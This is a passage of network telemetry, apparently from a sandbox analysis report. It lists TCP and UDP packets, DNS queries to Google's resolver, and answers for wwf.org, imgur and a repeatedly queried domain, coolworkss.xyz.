Sep 5, 2023 13:03:11.401465893 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401592016 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401665926 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401688099 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401753902 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401776075 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402007103 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402033091 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402051926 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402077913 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402102947 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402122974 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402143002 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402221918 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402285099 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402367115 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402393103 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402421951 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402446985 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402470112 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402678013 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402698040 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402718067 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402738094 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402806997 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402878046 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402899027 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.402962923 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403110981 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403132915 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403202057 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403225899 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403331995 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403353930 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403414011 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403466940 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403491974 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403512001 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403579950 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403707981 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403728008 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403753996 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403774977 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403795004 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.403980970 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404000998 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404077053 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404217005 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404237986 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404345989 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404418945 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404499054 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404603958 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404707909 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.404881001 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.405008078 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.405031919 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.405154943 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.405282021 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.405400038 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.405579090 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.405656099 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.405818939 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.405905008 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406063080 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406136990 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406245947 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406312943 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406333923 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406450987 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406496048 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406516075 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406579018 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406687021 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.406755924 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.430551052 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.430625916 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.430663109 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.430695057 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.430808067 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.430846930 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.430881023 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.430977106 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.521076918 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.521131992 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.521203995 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.521689892 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.521725893 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.521867037 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.522094965 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.522366047 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.522432089 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.522509098 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.522713900 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.522809029 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.523036003 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.523252964 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.523289919 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.523336887 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.523382902 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.524785042 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.524899006 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.525105953 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.525154114 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.525187016 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.525221109 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:12.624473095 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:12.624550104 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:12.624773979 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:12.630727053 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:18.343882084 CEST	49738	80	192.168.2.4	172.67.195.229

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2023 13:01:19.539535999 CEST	49817	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:01:19.708534002 CEST	53	49817	8.8.8.8	192.168.2.4
Sep 5, 2023 13:01:20.793716908 CEST	62550	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:01:20.946214914 CEST	53	62550	8.8.8.8	192.168.2.4
Sep 5, 2023 13:01:21.859819889 CEST	53300	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:01:22.002590895 CEST	53	53300	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:22.756494045 CEST	64196	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:22.913639069 CEST	53	64196	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:23.579417944 CEST	54863	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:23.745657921 CEST	53	54863	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:24.349047899 CEST	55398	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:24.491278887 CEST	53	55398	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:25.070193052 CEST	54432	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:25.223656893 CEST	53	54432	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:25.709424973 CEST	49985	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:25.865490913 CEST	53	49985	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:26.454027891 CEST	51273	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:26.621381998 CEST	53	51273	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:27.174302101 CEST	61330	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:27.329173088 CEST	53	61330	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:27.898886919 CEST	60926	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:28.068356037 CEST	53	60926	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:28.641485929 CEST	59300	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:28.782212019 CEST	53	59300	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:29.382674932 CEST	49247	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:29.522876024 CEST	53	49247	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:30.149316072 CEST	55618	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:30.303704023 CEST	53	55618	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:31.558554888 CEST	54289	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:31.698564053 CEST	53	54289	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:34.552989960 CEST	52359	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:34.695635080 CEST	53	52359	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:35.482000113 CEST	49668	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:35.622256041 CEST	53	49668	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:36.214195013 CEST	58867	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:36.358743906 CEST	53	58867	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:37.509181976 CEST	52618	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:37.649600029 CEST	53	52618	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:38.230442047 CEST	63665	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:38.370668888 CEST	53	63665	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:38.928719997 CEST	58455	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:39.096272945 CEST	53	58455	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:39.649209023 CEST	57096	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:39.789850950 CEST	53	57096	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:40.375665903 CEST	62135	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:40.516215086 CEST	53	62135	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:41.022234917 CEST	54873	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:41.165035009 CEST	53	54873	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:41.684566975 CEST	56313	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:41.837364912 CEST	53	56313	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:42.458120108 CEST	55660	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:42.603630066 CEST	53	55660	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:43.275983095 CEST	58508	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:43.416393042 CEST	53	58508	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:44.036360979 CEST	49702	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:44.179506063 CEST	53	49702	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:44.916050911 CEST	63044	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:45.060606956 CEST	53	63044	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:45.691601992 CEST	64588	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:45.832770109 CEST	53	64588	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:46.437236071 CEST	63494	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:46.580255032 CEST	53	63494	8.8.8.8	192.168.2.4
Sep 5, 2023 13:02:47.163491011 CEST	57902	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:02:47.306771040 CEST	53	57902	8.8.8.8	192.168.2.4
Sep 5, 2023 13:03:03.129585028 CEST	61038	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:03:03.270160913 CEST	53	61038	8.8.8.8	192.168.2.4
Sep 5, 2023 13:03:03.870151997 CEST	61960	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:03:04.000036001 CEST	53	61960	8.8.8.8	192.168.2.4
Sep 5, 2023 13:03:04.715390921 CEST	53014	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:03:04.855694056 CEST	53	53014	8.8.8.8	192.168.2.4
Sep 5, 2023 13:03:05.408701897 CEST	54956	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:03:05.550044060 CEST	53	54956	8.8.8.8	192.168.2.4
Sep 5, 2023 13:03:06.458864927 CEST	64701	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:03:06.600178003 CEST	53	64701	8.8.8.8	192.168.2.4
Sep 5, 2023 13:03:08.287476063 CEST	57676	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:03:08.428569078 CEST	53	57676	8.8.8.8	192.168.2.4
Sep 5, 2023 13:03:08.980694056 CEST	64496	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:03:09.125320911 CEST	53	64496	8.8.8.8	192.168.2.4
Sep 5, 2023 13:03:10.337860107 CEST	49727	53	192.168.2.4	8.8.8.8
Sep 5, 2023 13:03:10.478565931 CEST	53	49727	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 5, 2023 13:01:19.539535999 CEST	192.168.2.4	8.8.8.8	0xf343	Standard query (0)	wwf.org	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:01:20.793716908 CEST	192.168.2.4	8.8.8.8	0xc55b	Standard query (0)	www.worldwildlife.org	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:01:21.859819889 CEST	192.168.2.4	8.8.8.8	0x5e6	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:22.756494045 CEST	192.168.2.4	8.8.8.8	0x74f	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:23.579417944 CEST	192.168.2.4	8.8.8.8	0xa055	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:24.349047899 CEST	192.168.2.4	8.8.8.8	0x7471	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:25.070193052 CEST	192.168.2.4	8.8.8.8	0xa6e1	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:25.709424973 CEST	192.168.2.4	8.8.8.8	0xa580	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:26.454027891 CEST	192.168.2.4	8.8.8.8	0x3441	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:27.174302101 CEST	192.168.2.4	8.8.8.8	0x8278	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:27.898886919 CEST	192.168.2.4	8.8.8.8	0x43fb	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:28.641485929 CEST	192.168.2.4	8.8.8.8	0x828c	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:29.382674932 CEST	192.168.2.4	8.8.8.8	0xd7a5	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:30.149316072 CEST	192.168.2.4	8.8.8.8	0xf13d	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:31.558554888 CEST	192.168.2.4	8.8.8.8	0xfbfd	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:34.552989960 CEST	192.168.2.4	8.8.8.8	0xf87	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:35.482000113 CEST	192.168.2.4	8.8.8.8	0x283f	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:36.214195013 CEST	192.168.2.4	8.8.8.8	0x631b	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:37.509181976 CEST	192.168.2.4	8.8.8.8	0xbfcc	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:38.230442047 CEST	192.168.2.4	8.8.8.8	0x9338	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:38.928719997 CEST	192.168.2.4	8.8.8.8	0xb151	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:39.649209023 CEST	192.168.2.4	8.8.8.8	0x2f06	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:40.375665903 CEST	192.168.2.4	8.8.8.8	0x19f4	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:41.022234917 CEST	192.168.2.4	8.8.8.8	0x961d	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:41.684566975 CEST	192.168.2.4	8.8.8.8	0xe3f9	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:42.458120108 CEST	192.168.2.4	8.8.8.8	0x990f	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:43.275983095 CEST	192.168.2.4	8.8.8.8	0x5be2	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:44.036360979 CEST	192.168.2.4	8.8.8.8	0x2644	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:44.916050911 CEST	192.168.2.4	8.8.8.8	0x5c16	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:45.691601992 CEST	192.168.2.4	8.8.8.8	0x9462	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:46.437236071 CEST	192.168.2.4	8.8.8.8	0xcdbc	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:47.163491011 CEST	192.168.2.4	8.8.8.8	0x386d	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:03.129585028 CEST	192.168.2.4	8.8.8.8	0xcb86	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:03.870151997 CEST	192.168.2.4	8.8.8.8	0x343a	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:04.715390921 CEST	192.168.2.4	8.8.8.8	0x6336	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:05.408701897 CEST	192.168.2.4	8.8.8.8	0x14a7	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:06.458864927 CEST	192.168.2.4	8.8.8.8	0xec9d	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:08.287476063 CEST	192.168.2.4	8.8.8.8	0x5e77	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:08.980694056 CEST	192.168.2.4	8.8.8.8	0x4109	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:10.337860107 CEST	192.168.2.4	8.8.8.8	0x429d	Standard query (0)	coolworkss.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 5, 2023 13:01:19.708534002 CEST	8.8.8.8	192.168.2.4	0xf343	No error (0)	wwf.org		104.18.6.142	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:01:19.708534002 CEST	8.8.8.8	192.168.2.4	0xf343	No error (0)	wwf.org		104.18.7.142	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:01:20.946214914 CEST	8.8.8.8	192.168.2.4	0xc55b	No error (0)	www.worldwildlife.org		104.18.6.94	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:01:20.946214914 CEST	8.8.8.8	192.168.2.4	0xc55b	No error (0)	www.worldwildlife.org		104.18.7.94	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:01:22.002590895 CEST	8.8.8.8	192.168.2.4	0x5e6	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2023 13:01:22.002590895 CEST	8.8.8.8	192.168.2.4	0x5e6	No error (0)	ipv4.imgur.map.fastly.net		199.232.32.193	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:22.913639069 CEST	8.8.8.8	192.168.2.4	0x74f	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:22.913639069 CEST	8.8.8.8	192.168.2.4	0x74f	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:23.745657921 CEST	8.8.8.8	192.168.2.4	0xa055	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:23.745657921 CEST	8.8.8.8	192.168.2.4	0xa055	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:24.491278887 CEST	8.8.8.8	192.168.2.4	0x7471	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:24.491278887 CEST	8.8.8.8	192.168.2.4	0x7471	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:25.223656893 CEST	8.8.8.8	192.168.2.4	0xa6e1	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:25.223656893 CEST	8.8.8.8	192.168.2.4	0xa6e1	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:25.865490913 CEST	8.8.8.8	192.168.2.4	0xa580	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:25.865490913 CEST	8.8.8.8	192.168.2.4	0xa580	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:26.621381998 CEST	8.8.8.8	192.168.2.4	0x3441	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:26.621381998 CEST	8.8.8.8	192.168.2.4	0x3441	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:27.329173088 CEST	8.8.8.8	192.168.2.4	0x8278	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:27.329173088 CEST	8.8.8.8	192.168.2.4	0x8278	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:28.068356037 CEST	8.8.8.8	192.168.2.4	0x43fb	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:28.068356037 CEST	8.8.8.8	192.168.2.4	0x43fb	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:28.782212019 CEST	8.8.8.8	192.168.2.4	0x828c	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:28.782212019 CEST	8.8.8.8	192.168.2.4	0x828c	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:29.522876024 CEST	8.8.8.8	192.168.2.4	0xd7a5	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:29.522876024 CEST	8.8.8.8	192.168.2.4	0xd7a5	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:30.303704023 CEST	8.8.8.8	192.168.2.4	0xf13d	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:30.303704023 CEST	8.8.8.8	192.168.2.4	0xf13d	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:31.698564053 CEST	8.8.8.8	192.168.2.4	0xfbfd	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:31.698564053 CEST	8.8.8.8	192.168.2.4	0xfbfd	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:34.695635080 CEST	8.8.8.8	192.168.2.4	0xf87	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:34.695635080 CEST	8.8.8.8	192.168.2.4	0xf87	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:35.622256041 CEST	8.8.8.8	192.168.2.4	0x283f	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:35.622256041 CEST	8.8.8.8	192.168.2.4	0x283f	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
